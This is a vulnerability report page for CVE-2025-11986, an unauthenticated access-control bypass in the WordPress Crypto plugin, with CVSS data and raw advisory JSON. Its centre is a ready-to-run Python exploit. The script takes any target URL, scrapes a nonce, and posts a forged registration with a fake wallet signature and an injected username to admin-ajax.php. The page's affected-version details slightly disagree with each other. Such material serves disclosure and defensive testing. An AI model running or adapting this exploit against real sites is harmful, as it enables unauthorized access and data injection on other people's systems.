Security Vulnerability Report
中文
CVE-2025-11986 CVSS 5.3 MEDIUM

CVE-2025-11986

Published: 2025-11-11 04:15:45
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Crypto plugin for WordPress is vulnerable to Information exposure in all versions up to, and including, 2.22. This is due to the plugin registering an unauthenticated AJAX action (wp_ajax_nopriv_crypto_connect_ajax_process) that allows calling the register and savenft methods with only a publicly-available nonce check and no wallet signature verification. This makes it possible for unauthenticated attackers to set a site-wide global authentication state via a single transient, bypassing all access controls for ALL visitors to the site. The impact is complete bypass of [crypto-block] shortcode restrictions and page-level access controls, affecting all site visitors for one hour, plus the ability to inject arbitrary data into the plugin's custom_users table.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Crypto插件 < 2.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-11986 PoC - WordPress Crypto Plugin Unauthorized Access Control Bypass Note: This PoC is for educational and security testing purposes only. """ import requests import re import sys from urllib.parse import urljoin def get_nonce(target_url): """Extract nonce from the target WordPress site""" try: response = requests.get(target_url, timeout=10) # Look for wpCreateNonce or crypto-related nonces nonce_patterns = [ r'nonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']', r'cryptoConnectNonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']', r'ajaxnonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']' ] content = response.text for pattern in nonce_patterns: match = re.search(pattern, content) if match: return match.group(1) return None except Exception as e: print(f"[-] Error fetching nonce: {e}") return None def exploit_crypto_plugin(target_url, nonce=None): """Send malicious request to bypass authentication""" endpoint = urljoin(target_url, '/wp-admin/admin-ajax.php') # Prepare the malicious payload data = { 'action': 'crypto_connect_ajax_process', 'sub_action': 'register', 'nonce': nonce or 'dummy', 'wallet_address': '0x' + 'A' * 40, 'signature': 'malicious_signature', 'email': '[email protected]', 'username': 'attacker_injected' } try: print(f"[*] Sending exploit request to {endpoint}") response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Response: {response.text[:500]}") return True else: print(f"[-] Request failed with status {response.status_code}") return False except Exception as e: print(f"[-] Error during exploitation: {e}") return False def main(): if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Target: {target}") print(f"[*] Extracting nonce...") nonce = get_nonce(target) if nonce: print(f"[+] Found nonce: {nonce}") else: print(f"[*] Using default nonce or proceeding without it") print(f"[*] Launching exploit...") exploit_crypto_plugin(target, nonce) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11986", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:44.780", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Crypto plugin for WordPress is vulnerable to Information exposure in all versions up to, and including, 2.22. This is due to the plugin registering an unauthenticated AJAX action (wp_ajax_nopriv_crypto_connect_ajax_process) that allows calling the register and savenft methods with only a publicly-available nonce check and no wallet signature verification. This makes it possible for unauthenticated attackers to set a site-wide global authentication state via a single transient, bypassing all access controls for ALL visitors to the site. The impact is complete bypass of [crypto-block] shortcode restrictions and page-level access controls, affecting all site visitors for one hour, plus the ability to inject arbitrary data into the plugin's custom_users table."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto-user.php#L95", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L65", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L9", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L95", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f062ef94-e558-478e-bbfd-06616aeb566b?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.